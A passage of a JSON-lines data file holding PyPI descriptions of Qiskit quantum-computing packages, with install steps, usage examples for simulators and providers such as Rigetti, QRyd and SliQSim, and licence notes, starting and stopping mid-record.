\u2502\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2551 \u2551\nmid_1: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u25610 \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u256c\u2550\n \u2551 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2551 \u2551\nout_0: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u256c\u2550\n \u2551 \u2551\nout_1: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\n \u2551\nout_2: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550InstallationInstall the latest release of theqiskit_qasm3_importpackage from pip:pip install qiskit_qasm3_importThis will automatically install all the dependencies as well (an OpenQASM 3\nparser, for example) if they are not already installed. Alternatively, you can\ninstall Qiskit Terra directly with this package as an optional dependency by\ndoingpip install qiskit-terra[qasm3-import]DevelopingIf you're looking to contribute to this project, please first readour contributing guidelines.Set up your development environment by installing the development requirements\nwith pip:pipinstall-rrequirements-dev.txttoxThis installs a few more packages than the dependencies of the package at\nruntime, because there are some tools we use for testing also included, such astoxandpytest.After the development requirements are installed, you can install an editable\nversion of the package withpipinstall-e.After this, any changes you make to the library code will immediately be present\nwhen you open a new Python interpreter session.Building documentationAfter the development requirements have been installed, the commandtox-edocswill build the HTML documentation, and place it indocs/_build/html. The\ndocumentation state of themainbranch of this repository is published tohttps://qiskit.github.io/qiskit-qasm3-import.Code style and lintingThe Python components of this repository are formatted usingblack. You can\nrun this on the required files by runningtox-eblackThe full lint suite can be run withtox-elintLicenseThis project is licensed underversion 2.0 of the Apache License."} +{"package": "qiskit-qcgpu-provider", "pacakge-description": "# Qiskit QCGPU ProviderThis module contains [Qiskit](https://www.qiskit.org/)simulators using the OpenCL based [QCGPU](https://qcgpu.github.io) library.This provider adds two quantum circuit simulators, which are:* Statevector simulator - returns the statevector of a quantum circuit applied to the |0> state* Qasm simulator - simulates a qasm quantum circuit that has been compiled to run on the simulator.These simulation backends take advantage of the GPU or other OpenCL devices.## InstallationFirst of all, you will have to have some OpenCL installation installed already.You can install this module from PyPI using pip:```bash$ pip install qiskit-qcgpu-provider```## UsageThe usage of this backend with Qiskit is shown in the [usage example](https://github.com/Qiskit/qiskit-qcgpu-provider/tree/master/examples)For more information on Qiskit and quantum simulations, look at the Qiskit tutorials and the [Qiskit instructions page](https://github.com/Qiskit/qiskit-terra)## BenchmarkingTo benchmark this simulator against the `BasicAer` `qasm_simulator`,you can run```bash$ python3 benchmark.py --samples 15 --qubits 5 --single True```## LicenseThis project uses the [Apache License Version 2.0 software license.](https://www.apache.org/licenses/LICENSE-2.0)"} +{"package": "qiskit-qcware", "pacakge-description": "No description available on PyPI."} +{"package": "qiskit-qir", "pacakge-description": "qiskit-qirQiskit to QIR translator.ExamplefromqiskitimportQuantumCircuitfromqiskit_qirimportto_qir_modulecircuit=QuantumCircuit(3,3,name=\"my-circuit\")circuit.h(0)circuit.cx(0,1)circuit.cx(1,2)circuit.measure([0,1,2],[0,1,2])module,entry_points=to_qir_module(circuit)bitcode=module.bitcodeir=str(module)InstallationInstallqiskit-qirwithpip:pipinstallqiskit-qirNote: this will automatically install PyQIR if needed.DevelopmentInstall from sourceTo install the package from source, clone the repo onto your machine, browse to the root directory and runpipinstall-e.TestsFirst, install the development dependencies usingpipinstall-rrequirements_dev.txtTo run the tests in your local environment, runmaketestTo run the tests in virtual environments on supported Python versions, runmaketest-allDocsTo build the docs using Sphinx, runmakedocs"} +{"package": "qiskit-qir-alice-bob-fork", "pacakge-description": "qiskit-qirQiskit to QIR translator.This is a temporary fork until the upstream qiskit-qir supports user-defined\ninstructions.ExamplefromqiskitimportQuantumCircuitfromqiskit_qirimportto_qir_modulecircuit=QuantumCircuit(3,3,name=\"my-circuit\")circuit.h(0)circuit.cx(0,1)circuit.cx(1,2)circuit.measure([0,1,2],[0,1,2])module,entry_points=to_qir_module(circuit)bitcode=module.bitcodeir=str(module)InstallationInstallqiskit-qirwithpip:pipinstallqiskit-qirNote: this will automatically install PyQIR if needed.DevelopmentInstall from sourceTo install the package from source, clone the repo onto your machine, browse to the root directory and runpipinstall-e.TestsFirst, install the development dependencies usingpipinstall-rrequirements_dev.txtTo run the tests in your local environment, runmaketestTo run the tests in virtual environments on supported Python versions, runmaketest-allDocsTo build the docs using Sphinx, runmakedocs"} +{"package": "qiskit-qrack-provider", "pacakge-description": "qiskit-qrack-providerThis repository contains a Qrack provider for Qiskit. You mustinstall PyQrackto use it.The underlying Qrack simulator is a high-performance, GPU-accelarated, noiseless simulator, by design. This repository provides the QrackQasmSimulator.This provider is based on and adapted from work by the IBM Qiskit Team and QCGPU's creator, Adam Kelly. Attribution is noted in content files, where appropriate. Original contributions and adaptations were made by Daniel Strano of the VM6502Q/Qrack Team.To use, in Qiskit:fromqiskit.providers.qrackimportQrackbackend=Qrack.get_backend('qasm_simulator')For example, for use withunitaryfund/mitiq, creating a (noiseless)executorcan be as simple as follows:fromqiskit.providers.qrackimportQrackdefexecutor(circuit,shots=1000):\"\"\"Executes the input circuit and returns the noisy expectation value , where A=|0><0|.\"\"\"# Use the Qrack QasmSimulator backend, (but it's specifically noiseless)ideal_backend=Qrack.get_backend('qasm_simulator')# Append measurementscircuit_to_run=circuit.copy()circuit_to_run.measure_all()# Run and get countsprint(f\"Executing circuit with{len(circuit)}gates using{shots}shots.\")job=ideal_backend.run(circuit_to_run,shots=shots)counts=job.result().get_counts()# Compute expectation value of the observable A=|0><0|returncounts[\"0\"]/shotsGenerally, you will need to adapt the aboveexecutorsnippet to your particular purpose.(Happy Qracking! You rock!)"} +{"package": "qiskit-qryd-provider", "pacakge-description": "Qiskit QRyd ProviderThis Python library contains a provider for theQiskitquantum computing framework. The provider allows for accessing the GPU-based emulator and the future Rydberg quantum computer of theQRydDemoconsortium.Interactive tutorials can be found on QRydDemo'sJupyter server.InstallationThe provider can be installed viapipfromPyPI:pipinstallqiskit-qryd-providerBasic UsageTo use the provider, a QRydDemo API token is required. The token can be obtained via ouronline registration form. You can use the token to initialize the provider:fromqiskit_qryd_providerimportQRydProviderprovider=QRydProvider(\"MY_TOKEN\")Afterwards, you can choose a backend. Different backends are available that are capable of running ideal simulations of quantum circuits. An inclusion of noise models is planned for the future. You can either choose a backend emulating 30 qubits arranged in a 5x6 square lattice with nearest-neighbor connectivitybackend=provider.get_backend(\"qryd_emulator$square\")or a backend emulating 30 qubits arranged in a triangle lattice with nearest-neighbor connectivitybackend=provider.get_backend(\"qryd_emulator$triangle\")If you use these backends, the compilation of quantum circuits happens on our servers. The circuits are compiled to comply with the native gate set and connectivity of the Rydberg platform, using a decomposer developed byHQS Quantum Simulations.After selecting a backend, you can run a circuit on the backend:fromqiskitimportQuantumCircuit,executeqc=QuantumCircuit(2,2)qc.h(0)qc.cx(0,1)qc.measure([0,1],[0,1])job=execute(qc,backend,shots=200)print(job.result().get_counts())Expert OptionsThe provider adds the phase-shifted controlled-Z gate (PCZGate) and the phase-shifted controlled-phase gate (PCPGate) to Qiskit. These gates equal the controlled-Z/phase gates up to single-qubit phase gates. The gates can be realized by the Rydberg platform in multiple ways [1,2,3]. The value of the phase shift of the PCZGate can be modified before using the backend via:fromqiskit_qryd_providerimportPCZGatePCZGate.set_theta(1.234)LicenseThe Qiskit QRyd Provider is licensed under theApache License 2.0."} +{"package": "qiskit-quainter", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qiskit-quaintier", "pacakge-description": "A Quantum backend provider"} +{"package": "qiskit-quantier", "pacakge-description": "QUANTier qiskit backend provider.Supports AerSimulator and QUANTierBackend as a backend.Build and upload to PyPI\n$ python3 -m build\n$ python3 -m twine upload dist/*"} +{"package": "qiskit-quantum-knn", "pacakge-description": "Qiskit Quantum kNNQiskit Quantum kNNis a pure quantum knn classifier for a gated quantum\ncomputer, which is build withQiskit.Qiskit Quantum kNN is made as a final project to fulfill a master's degree\nat the Radboud University Nijmegen, in collaboration with ING Quantum\nTechnology. It is build by usingAfham et al. (2020)as it's\nprimary guide on how to construct the quantum circuit used for distance\nmeasurements.InstallationThe best way of installingqiskit-quantum-knnis by usingpip:$pipinstallqiskit-quantum-knnSinceqiskit-quantum-knnruns mainly by usingqiskit, it is advised to check\nout theirinstallation guideon how to install Qiskit.LicenseApache License 2.0"} +{"package": "qiskit-qubit-reuse", "pacakge-description": "Qubit Reuse By Reset PluginThis repository contains an experimental transpiler pass calledqubit_reusewhich is executed at the end of theinitstage of transpilation. This pass is based on: Matthew DeCross et al. \"Qubit-reuse compilation with mid-circuit measurement and reset\"arXiv:2210.0.08039v1BackgroundCertain circuits can reduce the number of qubits required to produce results by resetting and re-using existent measured qubits. The order in which certain qubits are chosen is based on theircausal conesand the order in which they are measured.Causal ConesLet's say we have qubit a x in aDAGCircuit. We can traverse theDAGCircuitfrom the output node of x by checking all its predecessor nodes. When checking every operation node found, if at any point x interacts with other qubits, via a multi-qubit gate, the qubits in that operation are added to a set. From that point we continue evaluating recursively all the predecessor nodes in that multi-qubit interaction and adding all qubits found into the set, until no more predecessor nodes are left.When the traversal ends, the set will containall the qubits whose interactions affect qubit x. That is what we call the causal cone of x.Order of MeasurementQubits are re-arranged based on the length of their causal cones in ascending order, i.e. the first to be re-arranged are those with smaller causal cones.Before re-arranging a qubit, we need to check if there are any qubit that have been measured and is available to re-use. If so, we reset it and apply all operations onto its wire. Otherwise, a new qubit is added and the operations are passed on to that wire.InstallationThis package is not available through pypi, but can be installed by cloning this repository:gitclonehttps://github.com/qiskit-community/qiskit-qubit-reuseAnd then installing locally:pipinstall./qiskit-qubit-reuseIf you have the proper authentication keys, you can install it remotely by using:pipinstallgit+https://github.com/qiskit-community/qiskit-qubit-reuseUsageOnce installed, Qiskit is able to detect thequbit_reuseplugin via an entry point. All that needs to be done is to specify the init method in yourtranspilecall by usinginit_method=\"qubit_reuse\". Use the following example:fromqiskit.circuit.randomimportrandom_circuitfromqiskitimporttranspilefromqiskit.providers.fake_providerimportFakeGuadalupeV2qc=random_circuit(16,4,measure=True)transpiled_qc=transpile(qc,backend=FakeGuadalupeV2(),init_method=\"qubit_reuse\")This entry point provides the option with the least amount of qubits. If you want to specifically use the normal or dual circuit, you can specifcy that by using thequbit_reuse_normalor thequbit_reuse_dualendpoints.Warning: This plugin should only be used with circuits that contain measurements."} +{"package": "qiskit-qulacs", "pacakge-description": "Qiskit-Qulacs allows user to execute Qiskit programs using Qulacs backend.Qiskit-Qulacs is actively being developed, and we welcome your input and suggestions on the API and use-cases. If you have any ideas or feedback, please feel free to open a GitHub issue or contact us. We are interested in hearing about your experiences using the library.AboutBeginner's GuideInstallationQuickstart GuideTutorialsHow-TosHow to Give FeedbackContribution GuidelinesReferences and AcknowledgementsLicenseFor Developers/ContributorsContribution GuideTechnical DocsHow to Give FeedbackWe encourage your feedback! You can share your thoughts with us by:Opening an issuein the repositoryContribution GuidelinesFor information on how to contribute to this project, please take a look at ourcontribution guidelines.References and Acknowledgements[1] Qiskithttps://qiskit.org/[2] Qiskit-terrahttps://github.com/Qiskit/qiskit-terra[3] Qulacshttps://github.com/qulacs/qulacsLicenseApache License 2.0"} +{"package": "qiskit-qutree-cloud-provider", "pacakge-description": "No description available on PyPI."} +{"package": "qiskit-qutrit-calibration", "pacakge-description": "Qutrit CalibrationA qutrit experiment extension forQiskit Experiments. This package allows for straightforward calibration of single qutrit gates.Note:A word of caution: this package is an alpha release and subject to breaking API changes without much notice.Once installed it can imported usingimportqiskit_qutrit_calibrationInstallationThis package can be in one of three ways:Installed via pip aspipinstallqiskit-qutrit-calibrationInstalled from the downloaded repository using pip ascdqiskit-qutrit-calibration\npipinstall.Installed directly using the github urlpipinstallgit+https://github.com/qiskit-community/qutrit-calibrationUsageThis package allows users to spin up their own calibration experiments for single qutrit gatesSX12,X12,Sy12,Y12, andRZ12. The experiments to tune up these gates include:RoughEFFrequencyCalRoughEFAmplitudeCalNarrowBandSpectroscopyCalRoughEFXDragCalFineEFXAmplitudeCalSimply create a newQutritCalibrationsobject usingcals=QutritCalibrations.from_backend(backend)Then execute an experiment using the instantiatedQutritCalibrations, aTupleof qubit indices, and backend to run on. For example,fromqiskit_qutrit_calibrationimportlibraryexp=library.RoughEFFrequencyCal((qubit_index),calibrations=cals,backend=backend)Development ScriptsThis package includes several pre-configuredtoxscripts for automating\ndevelopment of your package. These commands can be run from the command linecdqutrit-calibration\ntox-eCommandDescription``py`Run unit tests for the package usingstestrblackAuto-format your package files usingBlacklintRun PyLint on your package to check code formatting. Note that linting will fail if runningblackwould modify any filesdocsGenerate documentation for the package using SphinxIf you do not already have the tox command installed, install it by runningpipinstalltoxTesting Your PackageThis package is configured withstestrandtoxscripts to run unit tests\nadded to thequtrit-calibration/testfolder.These can be run directly viastestrusing the commandcdqutrit-calibration\nstestrrunOr using to tox scripttox -e pyto install all dependencies and run the tests\nin an isolated virtual environment.To add tests to your package you must including them in a files prefixed astest_*.pyin thetest/folder or a subfolder. Tests should be written\nusing theunittestframework to make a test class containing each test\nas a separate method prefixed astest_*.For example:classBasicTests(unittest.TestCase):\"\"\"Some basic tests for Qiskit Qutrit Calibration\"\"\"deftest_something(self):\"\"\"A basic test of something\"\"\"# Write some code heresome_value=...target=...self.assertTrue(some_value,target)Documenting Your PackageYou can add documentation or tutorials to your package by including it in thequtrit-calibration/docsfolder and building it locally using\nthetox -edocscommand.Documentation is build using Sphinx. By default will include any API documentation\nadded to your packages main__init__.pyfile.LicenseApache License 2.0"} +{"package": "qiskit-rigetti", "pacakge-description": "Rigetti Provider for QiskitTry It OutTo try out this library, you can run example notebooks in a pre-madebinder. Alternately, you can run the following to build and run the image locally:dockerbuild-tqiskit-tutorials.\ndockerrun--rm-p8888:8888qiskit-tutorialsthen click on the link that is displayed after the container starts up.Pre-requisitesInstallDockerDownloadqelib1.incPlaceqelib1.incin a folder calledincin the project rootSetup QVM and quilcUsing Docker ComposeRundocker compose upto see service logs ordocker compose up -dto run in the background.Using Docker ManuallyStart the QVM:dockerrun--rm-it-p5000:5000rigetti/qvm-SStart the compiler:dockerrun--rm-it-p5555:5555-v\"$PWD\"/inc:/incrigetti/quilc-S-P--safe-include-directory/inc/UsageExample:fromqiskitimportexecutefromqiskit_rigettiimportRigettiQCSProvider,QuilCircuit# Get provider and backendp=RigettiQCSProvider()backend=p.get_simulator(num_qubits=2,noisy=True)# or p.get_backend(name='Aspen-9')# Create a Bell state circuitcircuit=QuilCircuit(2,2)circuit.h(0)circuit.cx(0,1)circuit.measure([0,1],[0,1])# Execute the circuit on the backendjob=execute(circuit,backend,shots=10,coupling_map=backend.coupling_map)# Grab results from the jobresult=job.result()# Return memory and countsmemory=result.get_memory(circuit)counts=result.get_counts(circuit)print(\"Result memory:\",memory)print(\"Result counts:\",counts)Rigetti Quantum Cloud Services (QCS)Execution against a QPU requires areservation via QCS.\nFor more information on using QCS, see theQCS documentation.AdvancedLifecycle HooksFor advanced QASM and Quil manipulation,before_compileandbefore_executekeyword arguments can be passed toRigettiQCSBackend.run()or to Qiskit'sexecute().Pre-compilation HooksAnybefore_compilehooks will apply, in order, just before compilation from QASM to native Quil.\nFor example:...defcustom_hook_1(qasm:str)->str:new_qasm=...returnnew_qasmdefcustom_hook_2(qasm:str)->str:new_qasm=...returnnew_qasmjob=execute(circuit,backend,shots=10,before_compile=[custom_hook_1,custom_hook_2])...Pre-execution HooksAnybefore_executehooks will apply, in order, just before execution (after translation from QASM to native Quil).\nFor example:frompyquilimportProgram...defcustom_hook_1(quil:Program)->Program:new_quil=...returnnew_quildefcustom_hook_2(quil:Program)->Program:new_quil=...returnnew_quiljob=execute(circuit,backend,shots=10,before_execute=[custom_hook_1,custom_hook_2])...Note:Onlycertain forms of Quil can can be executed on a QPU.\nIf pre-execution transformations produce a final program that is not QPU-compliant,ensure_native_quil=Truecan be\npassed toexecute()orRigettiQCSBackend.run()to recompile the final Quil program to native Quil prior to\nexecution. If no pre-execution hooks were supplied, this setting is ignored. If this setting is omitted, a value ofFalseis assumed.Example: Adding the Quil instructionH 0would result in an error ifensure_native_quil=Falseand the QPU does\nnot natively implement Hadamard gates.Built-in HooksThehooks.pre_compilationandhooks.pre_executionpackages provide a number of convenient hooks:set_rewiringUseset_rewiringto provide arewiring directiveto the Quil compiler. For example:fromqiskit_rigetti.hooks.pre_compilationimportset_rewiring...job=execute(circuit,backend,shots=10,before_compile=[set_rewiring(\"NAIVE\")])...Note: Rewiring directives requirequilcversion 1.25 or higher.enable_active_resetUseenable_active_resetto enableactive qubit reset,\nan optimization that can significantly reduce the time between executions. For example:fromqiskit_rigetti.hooks.pre_executionimportenable_active_reset...job=execute(circuit,backend,shots=10,before_execute=[enable_active_reset])...DevelopmentNote: This module is developed in Python 3.8, 3.9, and 3.10, other versions will currently fail type checking.Dependencies are managed withPoetryso you need to install that first. Once you've installed all dependencies (poetry install) and activated the virtual environment (poetry shell), you can use these rules from theMakefileto run common tasks:Run tests:make testCheck style and types:make check-allCheck style only:make check-styleCheck types only:make check-typesReformat all code (to makecheck-stylepass):make formatBuild documentation, serve locally, and watch for changes:make watch-docs(requiresdocsextra:poetry install -E docs)"} +{"package": "qiskit-rng", "pacakge-description": "Qiskit Random Number GenerationQiskit is an open-source framework for working with noisy intermediate-scale\nquantum computers (NISQ) at the level of pulses, circuits, and algorithms.This project contains support for Random Number Generation usingQiskitandIBM Quantum Experiencebackends. The\nresulting raw numbers can then be passed toCambridge Quantum Computing(CQC)\nrandomness extractors to get higher-quality random numbers.InstallationYou can install the project using pip:pipinstallqiskit_rngPIP will handle all python dependencies automatically, and you will always\ninstall the latest (and well-tested) version.UsageSetting up the IBM Quantum ProviderYou will need setup your IBM Quantum Experience account and provider in order to\naccess IBM Quantum backends. Seeqiskit-ibmq-providerfor more details.Generating random numbers using an IBM Quantum backendTo generate random numbers using an IBM Quantum backend:fromqiskitimportIBMQfromqiskit_rngimportGeneratorIBMQ.load_account()rng_provider=IBMQ.get_provider(hub='MY_HUB',group='MY_GROUP',project='MY_PROJECT')backend=rng_provider.backends.ibmq_ourencegenerator=Generator(backend=backend)output=generator.sample(num_raw_bits=1024).block_until_ready()print(output.mermin_correlator)Theoutputyou get back contains useful information such as the\nWeak Source of Randomness (result.wsr) used to generate the circuits, the resulting bits\n(result.raw_bits), and the Mermin correlator value (result.mermin_correlator).Using CQC extractors to get highly random outputIf you have access to the CQC extractors, you can feed the outputs from the previous\nstep to obtain higher quality random numbers:random_bits=output.extract()The code above uses the default parameter values, but the extractor is highly\nconfigurable. See documentation for some use case examples and parameter suggestions.DocumentationUsage and API documentation can be foundhere.LicenseApache License 2.0."} +{"package": "qiskit-scheduling-extension", "pacakge-description": "Qiskit Scheduling Extension PluginThis repository contains an extension library of pass manager plugins that can be used in thescheduling stageof Qiskit transpiler.Install and Use pluginTo use the scheduling extension plugin first install qiskit-scheduling-extension:pipinstallqiskit-scheduling-extensionOnce you have the plugin package installed you can use the plugin via thescheduling_methodargument on Qiskit'stranspile()function. For example,\nif you wanted to use thecompactscheduling method to compile a 15 qubit quantum\nvolume circuit for a backend you would do something like:fromqiskitimporttranspilefromqiskit.circuit.libraryimportQuantumVolumefromqiskit.providers.fake_providerimportFakePragueqc=QuantumVolume(15)qc.measure_all()backend=FakePrague()transpile(qc,backend,scheduling_method=\"compact\")Authors and CitationThe qiskit-scheduling-extension is the work ofmany peoplewho contribute to the project at different levels."} +{"package": "qiskit-shots-animator", "pacakge-description": "Quantum-Computer Microwave-Pulse AnimatorQiskitis an open-source framework for working with noisy quantum computers at the level of pulses, circuits, and algorithms. Tea Vui Huang'sQiskit-Shots-Animatoranimates microwave-pulse shots in a quantum circuit execution as microwave flashes either on a gate map, or x-ray photo of the quantum computer chip. Microwave measurement pulses interact with qubits via readout resonators and are reflected back, the animation illustrates readout microwave (MW) pulses at the corresponding Rx read-out resonators.UsagefromIPython.core.displayimportdisplay,Imagefromqiskit_shots_animator.visualizationimportsave_quantum_animation,get_supported_samples,get_sampleImport theqiskit-shots-animatorfunctions and callsave_quantum_animation()with the following parameters:filename (str): file name to save astype (str): 'gate' or 'xray'fps (int): shots per secondcounts (dict): job result counts, e.g. for 1024 shots: {'000': 510, '111': 514}sample (str): sample name, e.g. 'albatross'labelled (boolean): True or False, only for type='xray'microwave_color (str): Python colors, e.g. 'white', 'lightblue' etcmicrowave_intensity (int): 0.1 to 1.0 (weakest to strongest)Examples1a. Animate quantum circuit execution on gate map at 3 shots/sec on Qiskit-Aer backend withget_sample()to auto-select quantum deviceimportqiskit.tools.jupyterfromqiskitimportIBMQ,QuantumCircuit,Aer,executefromqiskit.circuit.randomimportrandom_circuitfromIPython.core.displayimportdisplay,Imagefromqiskit_shots_animator.visualizationimportsave_quantum_animation,get_supported_samples,get_sample# Generate and execute a 5-qubit random-circuit on Qiskit-Aer backendbackend=Aer.get_backend('qasm_simulator')while(1):circ=random_circuit(5,2,max_operands=3,measure=True)counts=execute(circ,backend,shots=1000).result().get_counts()iflen(counts)>4:break# Save & display animation of quantum circuit executionfilename=\"quantum-shots_5q.gif\"save_quantum_animation(filename,\"gate\",3,counts,get_sample(backend,circ))img=Image(filename);img.reload();display(img)print(circ.draw())'Sparrow' quantum device:1b. Animate quantum circuit execution on gate map at 3 shots/sec with 'giraffe' devicefilename=\"quantum-shots_5q_giraffe.gif\"save_quantum_animation(filename,\"gate\",3,counts,\"giraffe\")img=Image(filename);img.reload();display(img)'Giraffe' quantum device:1c. Animate quantum circuit execution on a labelled x-ray photo at 3 shots/sec, with microwave color 'lightblue' & microwave intensity 0.6filename=\"quantum-shots_5q_sparrow_xray-labelled.gif\"save_quantum_animation(filename,\"xray\",3,counts,get_sample(backend,circ),labelled=True,microwave_color=\"lightblue\",microwave_intensity=0.6)img=Image(filename);img.reload();display(img)'Sparrow' quantum device:1d. Animate quantum circuit execution on an unlabelled x-ray photo at 3 shots/sec, with microwave color 'white' & microwave intensity 0.5filename=\"quantum-shots_5q_sparrow_xray-unlabelled.gif\"save_quantum_animation(filename,\"xray\",3,counts,get_sample(backend,circ),labelled=False,microwave_color=\"white\",microwave_intensity=0.5)img=Image(filename);img.reload();display(img)'Sparrow' quantum device:1e. Animate quantum circuit execution on all supported devices at 3 shots/sec usingget_supported_samples()forsampleinget_supported_samples():print(sample);filename=\"quantum-shots_5q_\"+sample+\".gif\"if(save_quantum_animation(filename,\"gate\",3,counts,sample)==True):img=Image(filename);img.reload();display(img)2. Animate 15-qubits random-number-generator quantum circuit execution on IBMQ providerimportqiskit.tools.jupyterfromqiskitimportIBMQ,QuantumCircuit,Aer,executefromqiskit.circuit.randomimportrandom_circuitfromIPython.core.displayimportdisplay,Imagefromqiskit_shots_animator.visualizationimportsave_quantum_animation,get_sample,get_supported_samples# Generate and execute random circuit remotely on ibmq_qasm_simulatorprovider=IBMQ.load_account()provider=IBMQ.get_provider(hub='ibm-q')# Use 'ibmq_16_melbourne' if don't mind waiting in the queuebackend=provider.get_backend('ibmq_qasm_simulator')# Build a random-number-generator quantum circuitrng_size=15;circ=QuantumCircuit(rng_size,rng_size)circ.h(range(rng_size))# Applies hadamard gate to all qubitscirc.measure(range(rng_size),range(rng_size))# Measures all qubitscounts=execute(circ,backend,shots=1000).result().get_counts()# Save & display animation of quantum circuit executionfilename=\"quantum-shots_15q.gif\"save_quantum_animation(filename,\"gate\",3,counts,get_sample(backend,circ))img=Image(filename);img.reload();display(img)print(circ.draw())15-qubits 'Albatross' quantum device:3. Animate 20-qubits random-number-generator quantum circuit execution on IBMQ providerimportqiskit.tools.jupyterfromqiskitimportIBMQ,QuantumCircuit,Aer,executefromqiskit.circuit.randomimportrandom_circuitfromIPython.core.displayimportdisplay,Imagefromqiskit_shots_animator.visualizationimportsave_quantum_animation,get_sample,get_supported_samples# Generate and execute random circuit remotely on ibmq_qasm_simulatorprovider=IBMQ.load_account()provider=IBMQ.get_provider(hub='ibm-q')backend=provider.get_backend('ibmq_qasm_simulator')# Build a random-number-generator quantum circuitrng_size=20;circ=QuantumCircuit(rng_size,rng_size)circ.h(range(rng_size))# Applies hadamard gate to all qubitscirc.measure(range(rng_size),range(rng_size))# Measures all qubitscounts=execute(circ,backend,shots=1000).result().get_counts()# Save & display animation of quantum circuit executionfilename=\"quantum-shots_20q_unknown20a.gif\"save_quantum_animation(filename,\"gate\",3,counts,\"unknown20a\")img=Image(filename);img.reload();display(img)filename=\"quantum-shots_20q_unknown20b.gif\"save_quantum_animation(filename,\"gate\",3,counts,\"unknown20b\")img=Image(filename);img.reload();display(img)print(circ.draw())20-qubits quantum device:20-qubits quantum device:4. Animate 53-qubits random-number-generator quantum circuit execution on Qiskit-Aer backendimportqiskit.tools.jupyterfromqiskitimportIBMQ,QuantumCircuit,Aer,executefromqiskit.circuit.randomimportrandom_circuitfromIPython.core.displayimportdisplay,Imagefromqiskit_shots_animator.visualizationimportsave_quantum_animation,get_sample,get_supported_samples# Generate and execute random circuit locally on Aer qasm_simulatorbackend=Aer.get_backend('qasm_simulator')# Build a quantum circuit - random number generatorrng_size=53;circ=QuantumCircuit(rng_size,rng_size)circ.h(range(rng_size))# Applies hadamard gate to all qubitscirc.measure(range(rng_size),range(rng_size))# Measures all qubitscounts=execute(circ,backend,shots=1000).result().get_counts()# Save & display animation of quantum circuit executionfilename=\"quantum-shots_53q_unknown53a.gif\"save_quantum_animation(filename,\"gate\",3,counts,\"unknown53a\")img=Image(filename);img.reload();display(img)print(circ.draw())53-qubits quantum device:Author and CitationTea Vui Huang. (2020, November 10).\nQiskit Quantum-Computer Microwave-Pulse Animator.https://doi.org/10.5281/zenodo.4266489"} +{"package": "qiskit-sliqsim-provider", "pacakge-description": "SliQSim Qiskit Interface - Execute SliQSim on QiskitIntroductionThis is a Qiskit provider forSliQSimwhere you can executeSliQSimfrom Qiskit framework as a backend option.SliQSimis a BDD-based quantum circuit simulator implemented in C/C++ on top ofCUDDpackage. InSliQSim, a bit-slicing technique based on BDDs is used to represent quantum state vectors. For more details of the simulator, please refer to thepaper.InstallationTo use this provider, one should first install IBM'sQiskit(<=0.36.2), and then install the provider with pip.pip install qiskit==0.36.2\npip install qiskit-sliqsim-providerExecutionThe gate set supported in SliQSim now contains Pauli-X (x), Pauli-Y (y), Pauli-Z (z), Hadamard (h), Phase and its inverse (s and sdg), \u03c0/8 and its inverse (t and tdg), Rotation-X with phase \u03c0/2 (rx(pi/2)), Rotation-Y with phase \u03c0/2 (ry(pi/2)), Controlled-NOT (cx), Controlled-Z (cz), Toffoli (ccx and mcx), SWAP (swap), and Fredkin (cswap).For simulation types, we provide both sampling(default) and statevector simulation options, where the sampling simulation samples outcomes from the output distribution obtained after the circuit is applied, and the statevector simulation calculates the resulting state vector of the quantum circuit. Please turn off the optimization (optimization_level=0) to avoid using gates out of supported gate set. The following examples demostrate the usage of the provider.# Import toolsfromqiskitimportQuantumCircuit,QuantumRegister,ClassicalRegister,executefromqiskit_sliqsim_providerimportSliQSimProvider# Initiate SliQSim Providerprovider=SliQSimProvider()# Construct a 2-qubit bell-state circuitqr=QuantumRegister(2)cr=ClassicalRegister(2)qc=QuantumCircuit(qr,cr)qc.h(qr[0])qc.cx(qr[0],qr[1])qc.measure(qr,cr)# Get the backend of sampling simulationbackend=provider.get_backend('sampling')# Execute simulationjob=execute(qc,backend=backend,shots=1024,optimization_level=0)# Obtain and print the resultsresult=job.result()print(result.get_counts(qc))In the abovePython code, we construct a 2-qubit bell-state circuit with measurement gates at the end, and execute the simulator with sampling simulation backend optionsampling. The sampled result is then printed:{'00': 523, '11': 501}Circuits can also be read from files inOpenQASMformat, which is used by Qiskit. Here we read acircuit, which is also a 2-qubit bell-state circuit but with no measurements gates, to showcase the statevector simulation:qc=QuantumCircuit.from_qasm_file(\"../SliQSim/examples/bell_state.qasm\")To execute the statevector simulation, the backend optionsamplingis replaced withall_amplitude:backend=provider.get_backend('all_amplitude')job=execute(qc,backend=backend,optimization_level=0)and after obtaining the results, we acquire the state vector instead of the counts of sampled outcomes:result=job.result()print(result.get_statevector(qc))The state vector is then printed:[0.707107+0.j 0. +0.j 0. +0.j 0.707107+0.j]One may also use our simulator by executing a compiled binary file. Check thisrepo.CitationPlease cite the following paper if you use our simulator for your research:Y. Tsai, J. R. Jiang, and C. Jhang, \"Bit-Slicing the 